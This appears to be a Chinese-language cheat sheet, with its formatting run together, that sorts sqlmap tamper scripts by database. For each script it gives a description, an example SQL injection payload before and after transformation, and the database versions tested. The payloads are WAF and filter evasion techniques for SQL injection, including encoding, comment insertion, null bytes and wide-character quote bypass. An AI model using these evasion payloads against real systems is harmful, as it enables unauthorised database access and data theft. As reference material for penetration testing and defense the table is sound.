sqlmap绕过过滤的tamper脚本分类汇总--madebygreetwinnullnullnullnullnullnullnull支持的数据库编号脚本名称作用实现方式测试通过的数据库类型和版本ALL1apostrophemask.py用utf8代替引号("1AND'1'='1")'1AND%EF%BC%871%EF%BC%87=%EF%BC%871'null2base64encode.py用base64编码替换("1'ANDSLEEP(5)#")'MScgQU5EIFNMRUVQKDUpIw=='null3multiplespaces.py围绕SQL关键字添加多个空格('1UNIONSELECTfoobar')'1UNIONSELECTfoobar'null4space2plus.py用+替换空格('SELECTidFROMusers')'SELECT+id+FROM+users'null5nonrecursivereplacement.py双重查询语句。取代predefinedSQL关键字with表示suitablefor替代(例如.replace(“SELECT”、”"))filters('1UNIONSELECT2--')'1UNIOUNIONNSELESELECTCT2--'null6space2randomblank.py代替空格字符(“”)从一个随机的空白字符可选字符的有效集('SELECTidFROMusers')'SELECT%0Did%0DFROM%0Ausers'null7unionalltounion.py替换UNIONALLSELECTUNIONSELECT('-1UNIONALLSELECT')'-1UNIONSELECT'null8securesphere.py追加特制的字符串('1AND1=1')"1AND1=1and'0having'='0having'"MSSQL1space2hash.py绕过过滤‘=’替换空格字符(”),(’–‘)后跟一个破折号注释,一个随机字符串和一个新行(’n’)'1AND9227=9227''1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227'nullnull2equaltolike.pylike代替等号*Input:SELECT*FROMusersWHEREid=12*Output:SELECT*FROMusersWHEREidLIKE1nullnull3space2mssqlblank.py(mssql)空格替换为其它空符号Input:SELECTidFROMusersOutput:SELECT%08id%02FROM%0Fusers*MicrosoftSQLServer2000*MicrosoftSQLServer2005null4space2mssqlhash.py替换空格('1AND9227=9227')'1%23%0AAND%23%0A9227=9227'nullnull5between.py用between替换大于号(>)('1ANDA>B--')'1ANDANOTBETWEEN0ANDB--'nullnull6percentage.pyasp允许每个字符前面添加一个%号*Input:SELECTFIELDFROMTABLE*Output:%S%E%L%E%C%T%F%I%E%L%D%F%R%O%M%T%A%B%L%Enullnull7sp_password.py追加sp_password’从DBMS日志的自动模糊处理的有效载荷的末尾('1AND9227=9227--')'1AND9227=9227--sp_password'nullnull8charencode.pyurl编码*Input:SELECTFIELDFROM%20TABLE*Output:%53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45nullnull9randomcase.py随机大小写*Input:INSERT*Output:InsERtnullnull10charunicodeencode.py字符串unicode编码*Input:SELECTFIELD%20FROMTABLE*Output:%u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′nullnull11space2comment.pyReplacesspacecharacter(‘‘)withcomments‘/**/’*Input:SELECTidFROMusers*Output:SELECT//id//FROM/**/usersnullMYSQL1equaltolike.pylike代替等号*Input:SELECT*FROMusersWHEREid=12*Output:SELECT*FROMusersWHEREidLIKE1MicrosoftSQLServer2005MySQL4,5.0and5.5null2greatest.py绕过过滤’>’,用GREATEST替换大于号。('1ANDA>B')'1ANDGREATEST(A,B+1)=A'*MySQL4,5.0and5.5*Oracle10g*PostgreSQL8.3,8.4,9.0null3apostrophenullencode.py绕过过滤双引号,替换字符和双引号。tamper("1AND'1'='1")'1AND%00%271%00%27=%00%271'*MySQL4,5.0and5.5*Oracle10g*PostgreSQL8.3,8.4,9.0null4ifnull2ifisnull.py绕过对IFNULL过滤。替换类似’IFNULL(A,B)’为’IF(ISNULL(A),B,A)’('IFNULL(1,2)')'IF(ISNULL(1),2,1)'*MySQL5.0and5.5null5space2mssqlhash.py替换空格('1AND9227=9227')'1%23%0AAND%23%0A9227=9227'nullnull6modsecurityversioned.py过滤空格,包含完整的查询版本注释('1AND2>1--')'1/*!30874AND2>1*/--'*MySQL5.0null7space2mysqlblank.py空格替换其它空白符号(mysql)Input:SELECTidFROMusersOutput:SELECT%0Bid%0BFROM%A0users*MySQL5.1null8between.py用between替换大于号(>)('1ANDA>B--')'1ANDANOTBETWEEN0ANDB--'*MicrosoftSQLServer2005*MySQL4,5.0and5.5*Oracle10g*PostgreSQL8.3,8.4,9.0null9modsecurityzeroversioned.py包含了完整的查询与零版本注释('1AND2>1--')'1/*!00000AND2>1*/--'*MySQL5.0null10space2mysqldash.py替换空格字符(”)(’–‘)后跟一个破折号注释一个新行(’n’)('1AND9227=9227')'1--%0AAND--%0A9227=9227'nullnull11bluecoat.py代替空格字符后与一个有效的随机空白字符的SQL语句。然后替换=为like('SELECTidFROMuserswhereid=1')'SELECT%09idFROMuserswhereidLIKE1'*MySQL5.1,SGOSnull12percentage.pyasp允许每个字符前面添加一个%号*Input:SELECTFIELDFROMTABLE*Output:%S%E%L%E%C%T%F%I%E%L%D%F%R%O%M%T%A%B%L%E*MicrosoftSQLServer2000,2005*MySQL5.1.56,5.5.11*PostgreSQL9.0null13charencode.pyurl编码*Input:SELECTFIELDFROM%20TABLE*Output:%53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45*MicrosoftSQLServer2005*MySQL4,5.0and5.5*Oracle10g*PostgreSQL8.3,8.4,9.0null14randomcase.py随机大小写*Input:INSERT*Output:InsERt*MicrosoftSQLServer2005*MySQL4,5.0and5.5*Oracle10g*PostgreSQL8.3,8.4,9.0null15versionedkeywords.pyEncloseseachnon-functionkeywordwithversionedMySQLcomment*Input:1UNIONALLSELECTNULL,NULL,CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()ASCHAR),CHAR(32)),CHAR(58,100,114,117,58))#*Output:1/*!UNION**!ALL**!SELECT**!NULL*/,/*!NULL*/,CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS**!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#nullnull16space2comment.pyReplacesspacecharacter(‘‘)withcomments‘/**/’*Input:SELECTidFROMusers*Output:SELECT//id//FROM/**/users*MicrosoftSQLServer2005*MySQL4,5.0and5.5*Oracle10g*PostgreSQL8.3,8.4,9.0null17charunicodeencode.py字符串unicode编码*Input:SELECTFIELD%20FROMTABLE*Output:%u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′*MicrosoftSQLServer2000*MicrosoftSQLServer2005*MySQL5.1.56*PostgreSQL9.0.3null18versionedmorekeywords.py注释绕过*Input:1UNIONALLSELECTNULL,NULL,CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER()ASCHAR),CHAR(32)),CHAR(58,115,114,121,58))#*Output:1/*!UNION**!ALL**!SELECT**!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS**!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#null*MySQL<5.119halfversionedmorekeywords.py关键字前加注释*Input:value’UNIONALLSELECTCONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER()ASCHAR),CHAR(32)),CHAR(58,97,110,121,58)),NULL,NULL#AND‘QDWa’='QDWa*Output:value’/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),NULL,NULL#/*!0AND‘QDWa’='QDWa*MySQL4.0.18,5.0.22null20halfversionedmorekeywords.py当数据库为mysql时绕过防火墙,每个关键字之前添加mysql版本评论1.("value'UNIONALLSELECTCONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER()ASCHAR),CHAR(32)),CHAR(58,97,110,121,58)),NULL,NULL#AND'QDWa'='QDWa")2."value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND'QDWa'='QDWa"*MySQL4.0.18,5.0.22MySQL>=5.1.1321space2morehash.py空格替换为#号以及更多随机字符串换行符*Input:1AND9227=9227*Output:1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227MySQL5.1.41Oracle1greatest.py绕过过滤’>’,用GREATEST替换大于号。('1ANDA>B')'1ANDGREATEST(A,B+1)=A'*MySQL4,5.0and5.5*Oracle10g*PostgreSQL8.3,8.4,9.0null2apostrophenullencode.py绕过过滤双引号,替换字符和双引号。tamper("1AND'1'='1")'1AND%00%271%00%27=%00%271'*MySQL4,5.0and5.5*Oracle10g*PostgreSQL8.3,8.4,9.0null3between.py用between替换大于号(>)('1ANDA>B--')'1ANDANOTBETWEEN0ANDB--'*MicrosoftSQLServer2005*MySQL4,5.0and5.5*Oracle10g*PostgreSQL8.3,8.4,9.0null4charencode.pyurl编码*Input:SELECTFIELDFROM%20TABLE*Output:%53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45*MicrosoftSQLServer2005*MySQL4,5.0and5.5*Oracle10g*PostgreSQL8.3,8.4,9.0null5randomcase.py随机大小写*Input:INSERT*Output:InsERt*MicrosoftSQLServer2005*MySQL4,5.0and5.5*Oracle10g*PostgreSQL8.3,8.4,9.0null6charunicodeencode.py字符串unicode编码*Input:SELECTFIELD%20FROMTABLE*Output:%u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′*MicrosoftSQLServer2000*MicrosoftSQLServer2005*MySQL5.1.56*PostgreSQL9.0.3null7space2comment.pyReplacesspacecharacter(‘‘)withcomments‘/**/’*Input:SELECTidFROMusers*Output:SELECT//id//FROM/**/users*MicrosoftSQLServer2005*MySQL4,5.0and5.5*Oracle10g*PostgreSQL8.3,8.4,9.0PostgreSQL1greatest.py绕过过滤’>’,用GREATEST替换大于号。('1ANDA>B')'1ANDGREATEST(A,B+1)=A'*MySQL4,5.0and5.5*Oracle10g*PostgreSQL8.3,8.4,9.0null2apostrophenullencode.py绕过过滤双引号,替换字符和双引号。tamper("1AND'1'='1")'1AND%00%271%00%27=%00%271'*MySQL4,5.0and5.5*Oracle10g*PostgreSQL8.3,8.4,9.0null3between.py用between替换大于号(>)('1ANDA>B--')'1ANDANOTBETWEEN0ANDB--'*MicrosoftSQLServer2005*MySQL4,5.0and5.5*Oracle10g*PostgreSQL8.3,8.4,9.0null4percentage.pyasp允许每个字符前面添加一个%号*Input:SELECTFIELDFROMTABLE*Output:%S%E%L%E%C%T%F%I%E%L%D%F%R%O%M%T%A%B%L%E*MicrosoftSQLServer2000,2005*MySQL5.1.56,5.5.11*PostgreSQL9.0null5charencode.pyurl编码*Input:SELECTFIELDFROM%20TABLE*Output:%53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45*MicrosoftSQLServer2005*MySQL4,5.0and5.5*Oracle10g*PostgreSQL8.3,8.4,9.0null6randomcase.py随机大小写*Input:INSERT*Output:InsERt*MicrosoftSQLServer2005*MySQL4,5.0and5.5*Oracle10g*PostgreSQL8.3,8.4,9.0null7charunicodeencode.py字符串unicode编码*Input:SELECTFIELD%20FROMTABLE*Output:%u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′*MicrosoftSQLServer2000*MicrosoftSQLServer2005*MySQL5.1.56*PostgreSQL9.0.3null8space2comment.pyReplacesspacecharacter(‘‘)withcomments‘/**/’*Input:SELECTidFROMusers*Output:SELECT//id//FROM/**/users*MicrosoftSQLServer2005*MySQL4,5.0and5.5*Oracle10g*PostgreSQL8.3,8.4,9.0MicrosoftAccess1appendnullbyte.py在有效负荷结束位置加载零字节字符编码('1AND1=1')'1AND1=1%00'其他nullchardoubleencode.py双url编码(不处理以编码的)*Input:SELECTFIELDFROM%20TABLE*Output:%2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545nullnullnullunmagicquotes.py宽字符绕过GPCaddslashes*Input:1′AND1=1*Output:1%bf%27AND1=1–%20nullnullnullrandomcomments.py用/**/分割sql关键字‘INSERT’becomes‘IN//S//ERT’null
本文档为【sqlmap绕过过滤分类汇总】,请使用软件OFFICE或WPS软件打开。作品中的文字与图均可以修改和编辑,
图片更改请在作品中右键图片并更换,文字修改请直接点击文字进行修改,也可以新增和删除文档中的内容。
该文档来自用户分享,如有侵权行为请发邮件ishare@vip.sina.com联系网站客服,我们会及时删除。
[版权声明] 本站所有资料为用户分享产生,若发现您的权利被侵害,请联系客服邮件isharekefu@iask.cn,我们尽快处理。
本作品所展示的图片、画像、字体、音乐的版权可能需版权方额外授权,请谨慎使用。
网站提供的党政主题相关内容(国旗、国徽、党徽..)目的在于配合国家政策宣传,仅限个人学习分享使用,禁止用于任何广告和商用目的。
浙公网安备 33021202002483